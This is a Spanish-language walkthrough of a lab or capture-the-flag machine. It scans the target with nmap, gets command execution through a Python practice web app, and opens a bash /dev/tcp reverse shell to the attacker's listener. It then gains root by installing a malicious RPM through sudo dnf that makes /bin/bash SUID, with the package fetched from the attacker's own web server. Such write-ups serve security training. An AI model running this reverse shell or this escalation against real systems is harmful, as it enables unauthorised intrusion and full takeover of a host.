# Enumeracion de Puertos, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script 'vuln' --min-rate 5000 -vvv 172.17.0.2 -oN nmap

5000/tcp open  upnp?   syn-ack ttl 64
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.2 Python/3.12.2
|     Date: Fri, 20 Sep 2024 02:18:23 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 1959
|     Connection: close
|     <style>
|     body {
|     background-color: #343a40; /* Color de fondo oscuro */
|     font-family: Arial, sans-serif;
|     color: #fff; /* Color del texto blanco */
|     .container {
|     width: 50%;
|     margin: auto;
|     text-align: center;
|     .header {
|     margin-bottom: 20px;
|     .form {
|     background-color: #495057; /* Color de fondo oscuro para el formulario */
|     padding: 20px;
|     border-radius: 10px;
|     box-shadow: 0 0 10px rgba(255, 255, 255, 0.1); /* Sombra tenue en el formulario */
|     textarea {
|     width: 100%;
|     padding: 10px;
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
=========================================================================================

por lo que vemos en el reporte se trata de un servicio web asi que chequeamos en el navegador
http://172.17.0.2:5000 y observamos que es como para practicar python, por lo que probare 
la ejecucion de comandos:

import subprocess; subprocess.run('id', shell=True);

y vemos que devuelve: uid=1000(primpi) gid=1000(primpi) groups=1000(primpi)

por lo que tenemos ejecucion de comandos, asi que intentare enviarme una reverse shell, asi que 
me pongo en escucha por netcat 

nc -lnvp 4444

y envio la reverse shell

import subprocess; subprocess.run("bash -c '/bin/bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'", shell=True);

ahora si reviso netcat, he recibido la conexion!

# Escalada de privilegios

sudo -l

    (ALL) NOPASSWD: /usr/bin/dnf

__________________________________________________________________________
para escalar, busco el binario con searchbins (desde mi equipo)

searchbins -b dnf -f sudo

TF=$(mktemp -d)
echo 'chmod u+s /bin/bash' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

	| sudo dnf install -y x-1.0-1.noarch.rpm

____________________________________________________________________________

lo intento en la maquina comprometida pero no me deja crear el paquete .rpm
asi que lo creare en mi maquina, por lo que primero instalare lo necesario

_________________________________________________________________________
nota: debe tenerse instalado ruby para poder hacer la instalacion de fpm
_________________________________________________________________________

gem install --no-document fpm							
TF=$(mktemp -d)
echo 'chmod u+s /bin/bash' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

ahora me levanto un server python para descargar el .rpm en la maquina
vulnerada

python -m http.server 80

>>>>>procedemos a descargar el .rpm

cd ~
curl -O http://172.17.0.1/x-1.0-1.noarch.rpm
chmod +x x-1.0-1.noarch.rpm

>>>>>ahora procedemos con la escalada:

sudo /usr/bin/dnf install -y x-1.0-1.noarch.rpm

Fedora 39 - x86_64                              447 kB/s |  89 MB     03:24    
Fedora 39 openh264 (From Cisco) - x86_64        228  B/s | 2.6 kB     00:11    
Fedora 39 - x86_64 - Updates                    439 kB/s |  41 MB     01:35    
Dependencies resolved.
================================================================================
 Package      Architecture      Version           Repository               Size
================================================================================
Installing:
 x            noarch            1.0-1             @commandline            6.0 k

Transaction Summary
================================================================================
Install  1 Package

Total size: 6.0 k
Installed size: 20  
Downloading Packages:
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                        1/1 
  Running scriptlet: x-1.0-1.noarch                                         1/1 
  Installing       : x-1.0-1.noarch                                         1/1 
  Verifying        : x-1.0-1.noarch                                         1/1 

Installed:
  x-1.0-1.noarch                                                                

Complete!

ls -la /bin/bash
-rwsr-xr-x 1 root root 1443376 Jan 22  2024 /bin/bash
/bin/bash -p
whoami
#root
